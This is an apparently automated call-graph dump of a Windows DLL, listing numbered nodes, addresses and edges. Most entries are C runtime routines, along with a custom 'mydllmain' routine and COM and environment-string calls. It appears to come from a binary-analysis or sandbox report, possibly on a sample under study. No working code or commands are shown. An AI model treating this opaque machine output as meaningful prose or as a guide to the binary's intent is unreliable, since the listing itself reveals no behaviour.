13358 6cdfaf1a 13356->13358 13359 6cdfaefd 13357->13359 13360 6cdfaf1f 13358->13360 13361 6cdfaf2c 13358->13361 13362 6cdfbcda __wsopen_s 50 API calls 13359->13362 13363 6cdfe211 __dosmaperr 17 API calls 13360->13363 13449 6cdfff21 13361->13449 13370 6cdfaf08 13362->13370 13363->13370 13366 6cdfaf3b 13368 6cdfe211 __dosmaperr 17 API calls 13366->13368 13367 6cdfaf48 __DllMainCRTStartup@12 13457 6cdfaf84 13367->13457 13368->13370 13370->13240 13370->13241 13372 6cdfd3de 13371->13372 13373 6cdfd3e4 13371->13373 13394 6cdff9e2 13372->13394 13377 6cdfd3e8 SetLastError 13373->13377 13400 6cdffa21 13373->13400 13377->13351 13381 6cdfd42e 13384 6cdffa21 _unexpected 7 API calls 13381->13384 13382 6cdfd41d 13383 6cdffa21 _unexpected 7 API calls 13382->13383 13391 6cdfd42b 13383->13391 13385 6cdfd43a 13384->13385 13386 6cdfd43e 13385->13386 13387 6cdfd455 13385->13387 13388 6cdffa21 _unexpected 7 API calls 13386->13388 13413 6cdfd079 13387->13413 13388->13391 13389 6cdfe224 __freea 15 API calls 13389->13377 13391->13389 13393 6cdfe224 __freea 15 API calls 13393->13377 13418 6cdff880 13394->13418 13396 6cdff9fe 13397 6cdffa19 TlsGetValue 13396->13397 13398 6cdffa07 mydllmain 13396->13398 13399 6cdffa14 13398->13399 13399->13373 13401 6cdff880 _unexpected 5 API calls 13400->13401 13402 6cdffa3d 13401->13402 13403 6cdffa5b TlsSetValue 13402->13403 13404 6cdffa46 mydllmain 13402->13404 13405 6cdfd400 13404->13405 13405->13377 13406 6cdff70a 13405->13406 13412 6cdff717 _unexpected 13406->13412 13407 6cdff757 13409 6cdfe211 __dosmaperr 16 API calls 13407->13409 13408 6cdff742 RtlAllocateHeap 13410 6cdfd415 13408->13410 13408->13412 13409->13410 13410->13381 13410->13382 13412->13407 13412->13408 13424 6cdfbd70 13412->13424 13429 6cdfcf0d 13413->13429 13419 6cdff8b0 13418->13419 13423 6cdff8ac _unexpected 13418->13423 13420 6cdff7b5 _unexpected LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 13419->13420 13419->13423 13421 6cdff8c4 13420->13421 13422 6cdff8ca GetProcAddress 13421->13422 13421->13423 13422->13423 13423->13396 13425 6cdfbd9c _unexpected EnterCriticalSection LeaveCriticalSection 13424->13425 13426 6cdfbd7b 13425->13426 13427 6cdfbd8e 13426->13427 13428 6cdfbd81 mydllmain 13426->13428 13427->13412 13428->13427 13430 6cdfcf19 __FrameHandler3::FrameUnwindToState 13429->13430 13431 6ce015d1 __FrameHandler3::FrameUnwindToState EnterCriticalSection 13430->13431 13432 6cdfcf23 13431->13432 13433 6cdfcf53 _unexpected LeaveCriticalSection 13432->13433 13434 6cdfcf41 13433->13434 13435 6cdfd01f 13434->13435 13436 6cdfd02b __FrameHandler3::FrameUnwindToState 13435->13436 13437 6ce015d1 __FrameHandler3::FrameUnwindToState EnterCriticalSection 13436->13437 13438 6cdfd035 13437->13438 13439 6cdfd200 _unexpected 17 API calls 13438->13439 13440 6cdfd04d 13439->13440 13441 6cdfd06d _unexpected LeaveCriticalSection 13440->13441 13442 6cdfd05b 13441->13442 13442->13393 13444 6cdfbc38 __wsopen_s 13443->13444 13445 6cdfbc5d __wsopen_s 33 API calls 13444->13445 13446 6cdfbc50 13445->13446 13447 6cdf5f8b __wsopen_s 50 API calls 13446->13447 13448 6cdfbc5b 13447->13448 13450 6cdfff2d __FrameHandler3::FrameUnwindToState 13449->13450 13461 6ce015d1 EnterCriticalSection 13450->13461 13452 6cdfff3b 13462 6cdfffc5 13452->13462 13458 6cdfaf88 __DllMainCRTStartup@12 13457->13458 13488 6cdfaed1 LeaveCriticalSection 13458->13488 13460 6cdfaf99 13460->13370 13461->13452 13470 6cdfffe8 13462->13470 13463 6ce00040 13464 6cdff70a _unexpected 17 API calls 13463->13464 13465 6ce00049 13464->13465 13467 6cdfe224 __freea 17 API calls 13465->13467 13468 6ce00052 13467->13468 13471 6cdfff48 13468->13471 13480 6cdffa63 13468->13480 13470->13463 13470->13471 13478 6cdfaebd EnterCriticalSection 13470->13478 13479 6cdfaed1 LeaveCriticalSection 13470->13479 13475 6cdfff81 13471->13475 13487 6ce01619 LeaveCriticalSection 13475->13487 13477 6cdfaf35 13477->13366 13477->13367 13478->13470 13479->13470 13481 6cdff880 _unexpected 5 API calls 13480->13481 13482 6cdffa7f 13481->13482 13483 6cdffa9d InitializeCriticalSectionAndSpinCount 13482->13483 13484 6cdffa88 mydllmain 13482->13484 13485 6cdffa9b 13483->13485 13484->13485 13486 6cdfaebd EnterCriticalSection 13485->13486 13486->13471 13487->13477 13488->13460 13491 6cdfb1bd __FrameHandler3::FrameUnwindToState 13489->13491 13490 6cdfb1c3 13492 6cdfbc5d __wsopen_s 33 API calls 13490->13492 13491->13490 13494 6cdfb206 13491->13494 13493 6cdfb1de 13492->13493 13493->13246 13500 6cdfaebd EnterCriticalSection 13494->13500 13496 6cdfb212 13501 6cdfb334 13496->13501 13498 6cdfb228 13510 6cdfb251 13498->13510 13500->13496 13502 6cdfb35a 13501->13502 13503 6cdfb347 13501->13503 13513 6cdfb25b 13502->13513 13503->13498 13505 6cdfb40b 13505->13498 13506 6cdfb37d __DllMainCRTStartup@12 13506->13505 13517 6cdffe0a 13506->13517 13556 6cdfaed1 LeaveCriticalSection 13510->13556 13512 6cdfb259 13512->13493 13514 6cdfb26c 13513->13514 13516 6cdfb2c4 __DllMainCRTStartup@12 13513->13516 13514->13516 13526 6cdfceaf 13514->13526 13516->13506 13518 6cdfb3ab 13517->13518 13519 6cdffe23 13517->13519 13523 6cdfceef 13518->13523 13519->13518 13532 6cdfcc82 13519->13532 13521 6cdffe3f 13539 6ce00e71 13521->13539 13550 6cdfcdce 13523->13550 13525 6cdfcf08 13525->13505 13527 6cdfcec3 __wsopen_s 13526->13527 13528 6cdfcdce __fread_nolock 52 API calls 13527->13528 13529 6cdfced8 13528->13529 13530 6cdf5f8b __wsopen_s 50 API calls 13529->13530 13531 6cdfcee7 13530->13531 13531->13516 13533 6cdfcc8e 13532->13533 13534 6cdfcca3 13532->13534 13535 6cdfe211 __dosmaperr 17 API calls 13533->13535 13534->13521 13536 6cdfcc93 13535->13536 13537 6cdfbcda __wsopen_s 50 API calls 13536->13537 13538 6cdfcc9e 13537->13538 13538->13521 13540 6ce00e7d __FrameHandler3::FrameUnwindToState 13539->13540 13541 6ce00ebe 13540->13541 13542 6ce00f04 13540->13542 13549 6ce00e85 13540->13549 13543 6cdfbc5d __wsopen_s 33 API calls 13541->13543 13544 6ce03114 __wsopen_s EnterCriticalSection 13542->13544 13543->13549 13545 6ce00f0a 13544->13545 13546 6ce00f28 13545->13546 13547 6ce00f82 __wsopen_s 73 API calls 13545->13547 13548 6ce00f7a ___scrt_uninitialize_crt LeaveCriticalSection 13546->13548 13547->13546 13548->13549 13549->13518 13551 6ce03390 __wsopen_s 50 API calls 13550->13551 13552 6cdfcde0 13551->13552 13553 6cdfcdfc SetFilePointerEx 13552->13553 13555 6cdfcde8 __wsopen_s 13552->13555 13554 6cdfce14 GetLastError 13553->13554 13553->13555 13554->13555 13555->13525 13556->13512 13558 6cdf5cfc __FrameHandler3::FrameUnwindToState 13557->13558 13559 6cdf5d24 13558->13559 13560 6cdf5d03 13558->13560 13568 6cdfaebd EnterCriticalSection 13559->13568 13561 6cdfbc5d __wsopen_s 33 API calls 13560->13561 13563 6cdf5d1c 13561->13563 13563->13252 13564 6cdf5d2f 13569 6cdf5d70 13564->13569 13568->13564 13575 6cdf5da2 13569->13575 13571 6cdf5d3e 13572 6cdf5d66 13571->13572 13610 6cdfaed1 LeaveCriticalSection 13572->13610 13574 6cdf5d6e 13574->13563 13576 6cdf5dd9 13575->13576 13577 6cdf5db1 13575->13577 13578 6cdfcc82 __fread_nolock 50 API calls 13576->13578 13579 6cdfbc5d __wsopen_s 33 API calls 13577->13579 13580 6cdf5de2 13578->13580 13581 6cdf5dcc __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 13579->13581 13588 6cdfce91 13580->13588 13581->13571 13584 6cdf5ea3 __DllMainCRTStartup@12 13584->13581 13603 6cdf5fc7 13584->13603 13585 6cdf5e8c 13591 6cdf6192 13585->13591 13589 6cdfcca9 __DllMainCRTStartup@12 54 API calls 13588->13589 13590 6cdf5e00 13589->13590 13590->13581 13590->13584 13590->13585 13592 6cdf61a1 __wsopen_s 13591->13592 13593 6cdfcc82 __fread_nolock 50 API calls 13592->13593 13595 6cdf61bd __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 13593->13595 13594 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13596 6cdf633b 13594->13596 13597 6cdfce91 __DllMainCRTStartup@12 54 API calls 13595->13597 13602 6cdf61c9 13595->13602 13596->13581 13598 6cdf621d 13597->13598 13599 6cdf624f ReadFile 13598->13599 13598->13602 13600 6cdf6276 13599->13600 13599->13602 13601 6cdfce91 __DllMainCRTStartup@12 54 API calls 13600->13601 13601->13602 13602->13594 13604 6cdfcc82 __fread_nolock 50 API calls 13603->13604 13605 6cdf5fda 13604->13605 13606 6cdfce91 __DllMainCRTStartup@12 54 API calls 13605->13606 13609 6cdf6024 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __DllMainCRTStartup@12 13605->13609 13607 6cdf6081 13606->13607 13608 6cdfce91 __DllMainCRTStartup@12 54 API calls 13607->13608 13607->13609 13608->13609 13609->13581 13610->13574 13612 6cdfafee __FrameHandler3::FrameUnwindToState 13611->13612 13613 6cdfb01b 13612->13613 13614 6cdfaff8 13612->13614 13621 6cdfb013 __DllMainCRTStartup@12 13613->13621 13622 6cdfaebd EnterCriticalSection 13613->13622 13615 6cdfbc5d __wsopen_s 33 API calls 13614->13615 13615->13621 13617 6cdfb039 13623 6cdfb079 13617->13623 13619 6cdfb046 13637 6cdfb071 13619->13637 13621->13257 13622->13617 13624 6cdfb0a9 13623->13624 13625 6cdfb086 13623->13625 13627 6cdffe0a ___scrt_uninitialize_crt 75 API calls 13624->13627 13628 6cdfb0a1 __DllMainCRTStartup@12 13624->13628 13626 6cdfbc5d __wsopen_s 33 API calls 13625->13626 13626->13628 13629 6cdfb0c1 13627->13629 13628->13619 13640 6cdffee1 13629->13640 13632 6cdfcc82 __fread_nolock 50 API calls 13633 6cdfb0d5 13632->13633 13644 6ce00525 13633->13644 13636 6cdfe224 __freea 17 API calls 13636->13628 13659 6cdfaed1 LeaveCriticalSection 13637->13659 13639 6cdfb077 13639->13621 13641 6cdfb0c9 13640->13641 13642 6cdffef8 13640->13642 13641->13632 13642->13641 13643 6cdfe224 __freea 17 API calls 13642->13643 13643->13641 13645 6ce0054e 13644->13645 13648 6cdfb0dc 13644->13648 13646 6ce0059d 13645->13646 13649 6ce00575 13645->13649 13647 6cdfbc5d __wsopen_s 33 API calls 13646->13647 13647->13648 13648->13628 13648->13636 13651 6ce00494 13649->13651 13652 6ce004a0 __FrameHandler3::FrameUnwindToState 13651->13652 13653 6ce03114 __wsopen_s EnterCriticalSection 13652->13653 13654 6ce004ae 13653->13654 13655 6ce005f8 __wsopen_s 53 API calls 13654->13655 13656 6ce004df 13654->13656 13655->13656 13657 6ce00519 __DllMainCRTStartup@12 LeaveCriticalSection 13656->13657 13658 6ce00502 13657->13658 13658->13648 13659->13639 13661 6cdfb9a3 __FrameHandler3::FrameUnwindToState 13660->13661 13662 6cdfb9ed 13661->13662 13664 6cdfb9b6 __fread_nolock 13661->13664 13672 6cdfb992 13661->13672 13673 6cdfaebd EnterCriticalSection 13662->13673 13665 6cdfe211 __dosmaperr 17 API calls 13664->13665 13667 6cdfb9d0 13665->13667 13666 6cdfb9f7 13674 6cdfb7a1 13666->13674 13669 6cdfbcda __wsopen_s 50 API calls 13667->13669 13669->13672 13672->13205 13673->13666 13677 6cdfb7b3 __fread_nolock 13674->13677 13680 6cdfb7d0 13674->13680 13675 6cdfb7c0 13676 6cdfe211 __dosmaperr 17 API calls 13675->13676 13678 6cdfb7c5 13676->13678 13677->13675 13677->13680 13682 6cdfb811 __fread_nolock 13677->13682 13679 6cdfbcda __wsopen_s 50 API calls 13678->13679 13679->13680 13687 6cdfba2c 13680->13687 13681 6cdfb93c __fread_nolock 13685 6cdfe211 __dosmaperr 17 API calls 13681->13685 13682->13680 13682->13681 13684 6cdfcc82 __fread_nolock 50 API calls 13682->13684 13690 6cdfba34 13682->13690 13704 6cdfdbf7 13682->13704 13684->13682 13685->13678 13810 6cdfaed1 LeaveCriticalSection 13687->13810 13689 6cdfba32 13689->13672 13691 6cdfba45 13690->13691 13695 6cdfba41 __fread_nolock 13690->13695 13692 6cdfba4c 13691->13692 13697 6cdfba5f __fread_nolock 13691->13697 13693 6cdfe211 __dosmaperr 17 API calls 13692->13693 13694 6cdfba51 13693->13694 13696 6cdfbcda __wsopen_s 50 API calls 13694->13696 13695->13682 13696->13695 13697->13695 13698 6cdfba8d 13697->13698 13699 6cdfba96 13697->13699 13700 6cdfe211 __dosmaperr 17 API calls 13698->13700 13699->13695 13702 6cdfe211 __dosmaperr 17 API calls 13699->13702 13701 6cdfba92 13700->13701 13703 6cdfbcda __wsopen_s 50 API calls 13701->13703 13702->13701 13703->13695 13705 6cdfdc09 13704->13705 13706 6cdfdc21 13704->13706 13767 6cdfe1fe 13705->13767 13707 6cdfdf63 13706->13707 13711 6cdfdc64 13706->13711 13710 6cdfe1fe __dosmaperr 17 API calls 13707->13710 13713 6cdfdf68 13710->13713 13714 6cdfdc6f 13711->13714 13718 6cdfdc16 13711->13718 13722 6cdfdc9f 13711->13722 13712 6cdfe211 __dosmaperr 17 API calls 13712->13718 13715 6cdfe211 __dosmaperr 17 API calls 13713->13715 13717 6cdfe1fe __dosmaperr 17 API calls 13714->13717 13716 6cdfdc7c 13715->13716 13720 6cdfbcda __wsopen_s 50 API calls 13716->13720 13719 6cdfdc74 13717->13719 13718->13682 13721 6cdfe211 __dosmaperr 17 API calls 13719->13721 13720->13718 13721->13716 13723 6cdfdcb8 13722->13723 13724 6cdfdcc5 13722->13724 13725 6cdfdcf3 13722->13725 13723->13724 13731 6cdfdce1 13723->13731 13726 6cdfe1fe __dosmaperr 17 API calls 13724->13726 13770 6cdfe25e 13725->13770 13727 6cdfdcca 13726->13727 13729 6cdfe211 __dosmaperr 17 API calls 13727->13729 13733 6cdfdcd1 13729->13733 13777 6ce03b25 13731->13777 13736 6cdfbcda __wsopen_s 50 API calls 13733->13736 13734 6cdfde3f 13737 6cdfdeb3 13734->13737 13740 6cdfde58 GetConsoleMode 13734->13740 13735 6cdfe224 __freea 17 API calls 13738 6cdfdd0d 13735->13738 13766 6cdfdcdc __fread_nolock 13736->13766 13739 6cdfdeb7 ReadFile 13737->13739 13741 6cdfe224 __freea 17 API calls 13738->13741 13742 6cdfdecf 13739->13742 13743 6cdfdf2b GetLastError 13739->13743 13740->13737 13744 6cdfde69 13740->13744 13745 6cdfdd14 13741->13745 13742->13743 13750 6cdfdea8 13742->13750 13748 6cdfde8f 13743->13748 13749 6cdfdf38 13743->13749 13744->13739 13751 6cdfde6f ReadConsoleW 13744->13751 13746 6cdfdd1e 13745->13746 13747 6cdfdd39 13745->13747 13752 6cdfe211 __dosmaperr 17 API calls 13746->13752 13754 6cdfceaf __fread_nolock 52 API calls 13747->13754 13748->13766 13786 6cdfe1b7 13748->13786 13753 6cdfe211 __dosmaperr 17 API calls 13749->13753 13762 6cdfdf0b 13750->13762 13763 6cdfdef4 13750->13763 13750->13766 13751->13750 13755 6cdfde89 GetLastError 13751->13755 13757 6cdfdd23 13752->13757 13758 6cdfdf3d 13753->13758 13754->13731 13755->13748 13756 6cdfe224 __freea 17 API calls 13756->13718 13760 6cdfe1fe __dosmaperr 17 API calls 13757->13760 13761 6cdfe1fe __dosmaperr 17 API calls 13758->13761 13760->13766 13761->13766 13762->13766 13804 6cdfd74f 13762->13804 13791 6cdfd909 13763->13791 13766->13756 13768 6cdfd3c8 __dosmaperr 17 API calls 13767->13768 13769 6cdfdc0e 13768->13769 13769->13712 13771 6cdfe29c 13770->13771 13775 6cdfe26c _unexpected 13770->13775 13772 6cdfe211 __dosmaperr 17 API calls 13771->13772 13774 6cdfdd04 13772->13774 13773 6cdfe287 HeapAlloc 13773->13774 13773->13775 13774->13735 13775->13771 13775->13773 13776 6cdfbd70 _unexpected mydllmain EnterCriticalSection LeaveCriticalSection 13775->13776 13776->13775 13778 6ce03b32 13777->13778 13779 6ce03b3f 13777->13779 13780 6cdfe211 __dosmaperr 17 API calls 13778->13780 13781 6ce03b4b 13779->13781 13782 6cdfe211 __dosmaperr 17 API calls 13779->13782 13783 6ce03b37 13780->13783 13781->13734 13784 6ce03b6c 13782->13784 13783->13734 13785 6cdfbcda __wsopen_s 50 API calls 13784->13785 13785->13783 13787 6cdfe1fe __dosmaperr 17 API calls 13786->13787 13788 6cdfe1c2 __dosmaperr 13787->13788 13789 6cdfe211 __dosmaperr 17 API calls 13788->13789 13790 6cdfe1d5 13789->13790 13790->13766 13792 6cdfd602 __fread_nolock 53 API calls 13791->13792 13794 6cdfd920 13792->13794 13793 6ce0293d __fread_nolock MultiByteToWideChar 13796 6cdfda1d 13793->13796 13795 6cdfd99b 13794->13795 13799 6cdfd9ab 13794->13799 13800 6cdfd951 13794->13800 13803 6cdfd965 13794->13803 13797 6cdfe211 __dosmaperr 17 API calls 13795->13797 13798 6cdfda26 GetLastError 13796->13798 13796->13800 13797->13800 13801 6cdfe1b7 __dosmaperr 17 API calls 13798->13801 13802 6cdfceaf __fread_nolock 52 API calls 13799->13802 13799->13803 13800->13766 13801->13800 13802->13803 13803->13793 13805 6cdfd789 13804->13805 13806 6cdfd81f ReadFile 13805->13806 13807 6cdfd81a 13805->13807 13806->13807 13808 6cdfd83c 13806->13808 13807->13766 13808->13807 13809 6cdfceaf __fread_nolock 52 API calls 13808->13809 13809->13807 13810->13689 13827 6cdfa5bb 13811->13827 13813 6cdfaa89 13816 6cdfaaae 13813->13816 13818 6cdfa560 __wsopen_s 50 API calls 13813->13818 13814 6cdfaa56 13817 6cdfbc5d __wsopen_s 33 API calls 13814->13817 13815 6cdfaa41 13815->13813 13815->13814 13826 6cdfaa71 __DllMainCRTStartup@12 13815->13826 13834 6cdfacf6 13816->13834 13817->13826 13818->13816 13820 6cdfacf6 __DllMainCRTStartup@12 53 API calls 13821 6cdfaac3 13820->13821 13821->13820 13822 6cdfaaec 13821->13822 13825 6cdfab77 __aulldiv __DllMainCRTStartup@12 13822->13825 13841 6cdfa502 13822->13841 13824 6cdfa502 __DllMainCRTStartup@12 50 API calls 13824->13826 13825->13824 13826->13266 13828 6cdfa5d3 13827->13828 13829 6cdfa5c0 13827->13829 13828->13815 13830 6cdfe211 __dosmaperr 17 API calls 13829->13830 13831 6cdfa5c5 13830->13831 13832 6cdfbcda __wsopen_s 50 API calls 13831->13832 13833 6cdfa5d0 13832->13833 13833->13815 13835 6cdfad18 13834->13835 13836 6cdfad02 13834->13836 13840 6cdfad28 13835->13840 13852 6cdff63f 13835->13852 13847 6cdff599 13836->13847 13838 6cdfad0d __DllMainCRTStartup@12 13838->13821 13840->13821 13842 6cdfa527 13841->13842 13843 6cdfa513 13841->13843 13842->13825 13843->13842 13844 6cdfe211 __dosmaperr 17 API calls 13843->13844 13845 6cdfa51c 13844->13845 13846 6cdfbcda __wsopen_s 50 API calls 13845->13846 13846->13842 13859 6cdfd277 GetLastError 13847->13859 13890 6cdff5bd 13852->13890 13856 6cdff66c 13857 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13856->13857 13858 6cdff708 13857->13858 13858->13840 13860 6cdfd28d 13859->13860 13861 6cdfd293 13859->13861 13862 6cdff9e2 _unexpected 7 API calls 13860->13862 13863 6cdffa21 _unexpected 7 API calls 13861->13863 13865 6cdfd297 SetLastError 13861->13865 13862->13861 13864 6cdfd2af 13863->13864 13864->13865 13866 6cdff70a _unexpected 17 API calls 13864->13866 13869 6cdfd32c 13865->13869 13870 6cdfd327 13865->13870 13868 6cdfd2c4 13866->13868 13871 6cdfd2dd 13868->13871 13872 6cdfd2cc 13868->13872 13873 6cdfcb25 __FrameHandler3::FrameUnwindToState 48 API calls 13869->13873 13886 6cdfe57e 13870->13886 13875 6cdffa21 _unexpected 7 API calls 13871->13875 13874 6cdffa21 _unexpected 7 API calls 13872->13874 13876 6cdfd331 13873->13876 13877 6cdfd2da 13874->13877 13878 6cdfd2e9 13875->13878 13882 6cdfe224 __freea 17 API calls 13877->13882 13879 6cdfd2ed 13878->13879 13880 6cdfd304 13878->13880 13881 6cdffa21 _unexpected 7 API calls 13879->13881 13883 6cdfd079 _unexpected 17 API calls 13880->13883 13881->13877 13882->13865 13884 6cdfd30f 13883->13884 13885 6cdfe224 __freea 17 API calls 13884->13885 13885->13865 13887 6cdfe591 13886->13887 13889 6cdfe5a6 13886->13889 13888 6ce036c3 __wsopen_s 50 API calls 13887->13888 13887->13889 13888->13889 13889->13838 13891 6cdff5db 13890->13891 13897 6cdff5d4 13890->13897 13892 6cdfd277 _unexpected 50 API calls 13891->13892 13891->13897 13893 6cdff5fc 13892->13893 13894 6cdfe57e __DllMainCRTStartup@12 50 API calls 13893->13894 13895 6cdff612 13894->13895 13896 6cdfe5dc __DllMainCRTStartup@12 50 API calls 13895->13896 13896->13897 13897->13856 13898 6ce03a04 13897->13898 13899 6cdff5bd __DllMainCRTStartup@12 50 API calls 13898->13899 13900 6ce03a24 13899->13900 13901 6ce0293d __fread_nolock MultiByteToWideChar 13900->13901 13904 6ce03a51 13901->13904 13902 6ce03ae0 13905 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 13902->13905 13903 6ce03ad8 13906 6ce03b05 __freea 17 API calls 13903->13906 13904->13902 13904->13903 13907 6cdfe25e __fread_nolock 18 API calls 13904->13907 13909 6ce03a76 __fread_nolock __alloca_probe_16 13904->13909 13908 6ce03b03 13905->13908 13906->13902 13907->13909 13908->13856 13909->13903 13910 6ce0293d __fread_nolock MultiByteToWideChar 13909->13910 13911 6ce03abf 13910->13911 13911->13903 13912 6ce03ac6 GetStringTypeW 13911->13912 13912->13903 13914 6cdfb50f 13913->13914 13919 6cdfb537 13913->13919 13915 6cdfb53e 13914->13915 13916 6cdfb51c 13914->13916 13914->13919 13921 6cdfb45a 13915->13921 13917 6cdfbc5d __wsopen_s 33 API calls 13916->13917 13917->13919 13919->13272 13922 6cdfb466 __FrameHandler3::FrameUnwindToState 13921->13922 13929 6cdfaebd EnterCriticalSection 13922->13929 13924 6cdfb474 13930 6cdfb4b5 13924->13930 13929->13924 13940 6cdff4b0 13930->13940 13937 6cdfb4a9 13960 6cdfaed1 LeaveCriticalSection 13937->13960 13939 6cdfb492 13939->13272 13941 6cdff472 __DllMainCRTStartup@12 50 API calls 13940->13941 13943 6cdff4c1 __DllMainCRTStartup@12 13941->13943 13942 6cdfb4cd 13947 6cdfb578 13942->13947 13943->13942 13944 6cdfe25e __fread_nolock 18 API calls 13943->13944 13945 6cdff51a 13944->13945 13946 6cdfe224 __freea 17 API calls 13945->13946 13946->13942 13949 6cdfb58a 13947->13949 13951 6cdfb4eb 13947->13951 13948 6cdfb598 13950 6cdfbc5d __wsopen_s 33 API calls 13948->13950 13949->13948 13949->13951 13955 6cdfb5ce __fread_nolock __DllMainCRTStartup@12 13949->13955 13950->13951 13956 6cdff55b 13951->13956 13952 6cdffe0a ___scrt_uninitialize_crt 75 API calls 13952->13955 13953 6cdfcc82 __fread_nolock 50 API calls 13953->13955 13954 6ce00e71 ___scrt_uninitialize_crt 75 API calls 13954->13955 13955->13951 13955->13952 13955->13953 13955->13954 13957 6cdfb481 13956->13957 13958 6cdff566 13956->13958 13957->13937 13958->13957 13959 6cdffe0a ___scrt_uninitialize_crt 75 API calls 13958->13959 13959->13957 13960->13939 13962 6cdf25ae 13961->13962 13963 6cdf25e9 13961->13963 13964 6cdf25b7 13962->13964 13965 6cdf25d6 13962->13965 13996 6cdf1152 13963->13996 13964->13963 13967 6cdf25be 13964->13967 13968 6cdf25cb 13965->13968 13971 6cdf2d38 __DllMainCRTStartup@12 52 API calls 13965->13971 13983 6cdf2d38 13967->13983 13968->13287 13969 6cdf25c4 13969->13968 14002 6cdfbcea 13969->14002 13971->13968 14021 6cdf2b24 13980->14021 13984 6cdf2d3d ___std_exception_copy 13983->13984 13985 6cdf2d57 13984->13985 13986 6cdfbd70 _unexpected 3 API calls 13984->13986 13987 6cdf2d59 13984->13987 13985->13969 13986->13984 13988 6cdf1152 Concurrency::cancel_current_task 13987->13988 13990 6cdf2d63 __DllMainCRTStartup@12 13987->13990 14007 6cdf3fdc 13988->14007 13992 6cdf3fdc CallUnexpected 2 API calls 13990->13992 13991 6cdf116e 14012 6cdf10c8 13991->14012 13994 6cdf326f 13992->13994 13997 6cdf1160 Concurrency::cancel_current_task 13996->13997 13998 6cdf3fdc CallUnexpected 2 API calls 13997->13998 13999 6cdf116e 13998->13999 14000 6cdf10c8 std::bad_exception::bad_exception 50 API calls 13999->14000 14001 6cdf117b 14000->14001 14001->13969 14003 6cdfbc26 __wsopen_s 50 API calls 14002->14003 14004 6cdfbcf9 14003->14004 14005 6cdfbd07 __wsopen_s 11 API calls 14004->14005 14006 6cdfbd06 14005->14006 14008 6cdf3ff6 14007->14008 14009 6cdf4023 RaiseException 14007->14009 14010 6cdf3ffb mydllmain 14008->14010 14011 6cdf4014 14008->14011 14009->13991 14010->14011 14011->14009 14015 6cdf3dae 14012->14015 14016 6cdf3dbb ___std_exception_copy 14015->14016 14020 6cdf10e9 14015->14020 14017 6cdf3de8 14016->14017 14018 6cdfcb69 ___std_exception_copy 50 API calls 14016->14018 14016->14020 14019 6cdfb786 ___std_exception_copy 17 API calls 14017->14019 14018->14017 14019->14020 14020->13969 14026 6cdf2abd 14021->14026 14024 6cdf3fdc CallUnexpected 2 API calls 14025 6cdf2b43 14024->14025 14029 6cdf2a6d 14026->14029 14030 6cdf3dae ___std_exception_copy 50 API calls 14029->14030 14031 6cdf2a99 14030->14031 14031->14024 14033 6cdf105f __DllMainCRTStartup@12 14032->14033 14059 6cdfa8c7 14033->14059 14037 6cdf1bb9 ExpandEnvironmentStringsW 14036->14037 14038 6cdf1bb7 14036->14038 14039 6cdf1bd1 14037->14039 14038->14037 14041 6cdf1be5 __fread_nolock 14039->14041 14091 6cdf2439 14039->14091 14042 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14041->14042 14043 6cdf1c30 VariantInit VariantInit VariantInit VariantInit 14042->14043 14043->13297 14045 6cdf11b6 __EH_prolog3 14044->14045 14046 6cdf2d38 __DllMainCRTStartup@12 52 API calls 14045->14046 14047 6cdf11bf 14046->14047 14048 6cdf11cd SysAllocString 14047->14048 14049 6cdf11ee 14047->14049 14048->14049 14050 6cdf2b50 __DllMainCRTStartup@12 mydllmain 14049->14050 14052 6cdf1201 __DllMainCRTStartup@12 14049->14052 14051 6cdf1215 14050->14051 14052->13306 14054 6cdf1221 14053->14054 14056 6cdf1233 __DllMainCRTStartup@12 14053->14056 14054->14056 14098 6cdf1244 14054->14098 14056->13308 14058 6cdf2264 14057->14058 14060 6cdfa8db __wsopen_s 14059->14060 14061 6cdfa8fd 14060->14061 14063 6cdfa924 14060->14063 14062 6cdfbc5d __wsopen_s 33 API calls 14061->14062 14065 6cdfa918 14062->14065 14068 6cdf642c 14063->14068 14066 6cdf5f8b __wsopen_s 50 API calls 14065->14066 14067 6cdf1078 CoUninitialize 14066->14067 14067->13302 14069 6cdf6438 __FrameHandler3::FrameUnwindToState 14068->14069 14076 6cdfaebd EnterCriticalSection 14069->14076 14071 6cdf6446 14077 6cdf83aa 14071->14077 14076->14071 14078 6cdff4b0 __DllMainCRTStartup@12 51 API calls 14077->14078 14079 6cdf83d1 __DllMainCRTStartup@12 14078->14079 14080 6cdf86a8 __DllMainCRTStartup@12 59 API calls 14079->14080 14081 6cdf8418 14080->14081 14082 6cdf836c __DllMainCRTStartup@12 17 API calls 14081->14082 14083 6cdf8425 14082->14083 14084 6cdff55b __DllMainCRTStartup@12 75 API calls 14083->14084 14085 6cdf8432 14084->14085 14086 6cdf2d25 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14085->14086 14087 6cdf6453 14086->14087 14088 6cdf647b 14087->14088 14089 6cdfaed1 __fread_nolock LeaveCriticalSection 14088->14089 14090 6cdf6464 14089->14090 14090->14065 14092 6cdf24a8 14091->14092 14093 6cdf2453 __DllMainCRTStartup@12 14091->14093 14094 6cdf119f __DllMainCRTStartup@12 52 API calls 14092->14094 14096 6cdf25a0 __DllMainCRTStartup@12 52 API calls 14093->14096 14095 6cdf24ad 14094->14095 14097 6cdf246b __fread_nolock 14096->14097 14097->14041 14099 6cdf124c SysFreeString 14098->14099 14100 6cdf1257 14098->14100 14099->14100 14100->14056 14101->12766 14103 6cdf3457 ___scrt_release_startup_lock 14102->14103 14104 6cdf345b 14103->14104 14107 6cdf3467 __DllMainCRTStartup@12 14103->14107 14131 6cdfc8fe 14104->14131 14106 6cdf3465 14106->12640 14108 6cdf3474 14107->14108 14135 6cdfc0e7 14107->14135 14108->12640 14219 6cdf4386 InterlockedFlushSList 14111->14219 14114 6cdf376a 14115 6cdf377a 14114->14115 14116 6cdf3792 14114->14116 14115->14116 14117 6cdf3781 mydllmain 14115->14117 14116->12645 14117->14115 14119 6cdf35ff 14118->14119 14120 6cdf2f59 14119->14120 14223 6cdfcaa7 14119->14223 